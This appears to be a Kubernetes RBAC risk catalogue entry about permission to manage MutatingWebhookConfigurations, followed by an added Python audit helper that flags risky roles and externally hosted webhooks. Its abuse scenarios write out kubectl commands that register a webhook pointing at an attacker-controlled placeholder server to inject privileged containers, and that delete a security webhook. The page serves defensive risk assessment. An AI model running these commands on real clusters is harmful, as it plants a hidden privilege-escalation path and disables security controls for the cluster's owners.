# Manage MutatingWebhookConfigurations

Risk category: Tampering. Risk level: Critical.
## Overview

| Field | Value |
|---|---|
| ID | 1043 |
| Name | Manage MutatingWebhookConfigurations |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | admissionregistration.k8s.io |
| Resources | mutatingwebhookconfigurations |
| Verbs | create, update, patch, delete |
| Tags | DenialOfService, PrivilegeEscalation, Tampering, WebhookManipulation |
## Description

Grants control over MutatingWebhookConfigurations, which register webhooks that the API server calls during admission and that can rewrite objects before they are persisted. This is extremely critical: an attacker holding these verbs can create or alter webhooks to inject malicious configuration into admitted objects, escalate privileges, bypass security policies, or cause denial of service.
## Abuse Scenarios

- Create a new MutatingWebhookConfiguration to inject privileged containers into pods.

  ```bash
  kubectl create -f - <<EOF
  apiVersion: admissionregistration.k8s.io/v1
  kind: MutatingWebhookConfiguration
  metadata:
    name: privileged-injector
  webhooks:
    - name: privileged-injector.example.com
      clientConfig:
        url: "https://<malicious-webhook-server>/mutate" # Attacker-controlled server
        caBundle: <base64-encoded-ca-cert> # Self-signed CA for attacker's server
      rules:
        - operations: ["CREATE"]
          apiGroups: [""]
          apiVersions: ["v1"]
          resources: ["pods"]
      admissionReviewVersions: ["v1", "v1beta1"]
      sideEffects: None
      failurePolicy: Ignore # To avoid breaking legitimate operations
  EOF
  ```
- Delete a critical MutatingWebhookConfiguration, potentially bypassing security policies.

  ```bash
  kubectl delete mutatingwebhookconfiguration <webhook-name>
  # Example: kubectl delete mutatingwebhookconfiguration pod-defaults-webhook
  ```
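An added audit helper (not from this page or any project) showing how a defender would find the ClusterRoles that grant these verbs, wildcard rules included, and flag webhook configurations that call out to a raw URL as the scenario above does; the sample ClusterRoles and webhook configuration are constructed and their names are hypothetical.

```python
RISKY_VERBS = {"create", "update", "patch", "delete"}
TARGET_GROUP = "admissionregistration.k8s.io"
TARGET_RESOURCE = "mutatingwebhookconfigurations"

def _matches(values, wanted):
    # Kubernetes RBAC treats "*" as matching every group, resource or verb
    return "*" in values or wanted in values

def risky_webhook_verbs(clusterrole):
    """Risky verbs a ClusterRole grants on mutatingwebhookconfigurations (wildcards expanded)."""
    granted = set()
    for rule in clusterrole.get("rules", []):
        if (_matches(rule.get("apiGroups", []), TARGET_GROUP)
                and _matches(rule.get("resources", []), TARGET_RESOURCE)):
            verbs = set(rule.get("verbs", []))
            granted |= RISKY_VERBS if "*" in verbs else verbs & RISKY_VERBS
    return granted

def external_webhooks(config):
    """Webhook names whose clientConfig is a raw URL rather than an in-cluster Service."""
    return [w["name"] for w in config.get("webhooks", [])
            if "url" in w.get("clientConfig", {})]

# Constructed sample objects in the shape of `kubectl get ... -o json` (not real cluster data)
SAMPLE_ROLES = [
    {"metadata": {"name": "webhook-admin"},
     "rules": [{"apiGroups": [TARGET_GROUP], "resources": [TARGET_RESOURCE],
                "verbs": ["get", "list", "patch"]}]},
    {"metadata": {"name": "cluster-superuser"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "webhook-viewer"},
     "rules": [{"apiGroups": [TARGET_GROUP], "resources": [TARGET_RESOURCE],
                "verbs": ["get", "list", "watch"]}]},
]
SAMPLE_WEBHOOK = {"webhooks": [
    {"name": "privileged-injector.example.com",
     "clientConfig": {"url": "https://webhook.example.invalid/mutate"}},
    {"name": "pod-defaults.kube-system.svc",
     "clientConfig": {"service": {"name": "pod-defaults", "namespace": "kube-system"}}},
]}

def audit(roles=SAMPLE_ROLES, webhook=SAMPLE_WEBHOOK):
    """Map each ClusterRole holding risky verbs to those verbs, plus external webhooks."""
    roles_out = {r["metadata"]["name"]: sorted(v)
                 for r in roles if (v := risky_webhook_verbs(r))}
    return roles_out, external_webhooks(webhook)

if __name__ == "__main__":
    print(audit())
```

Feed it the output of `kubectl get clusterrole -o json` and `kubectl get mutatingwebhookconfiguration -o json` (the `items` lists) to run it against a real cluster.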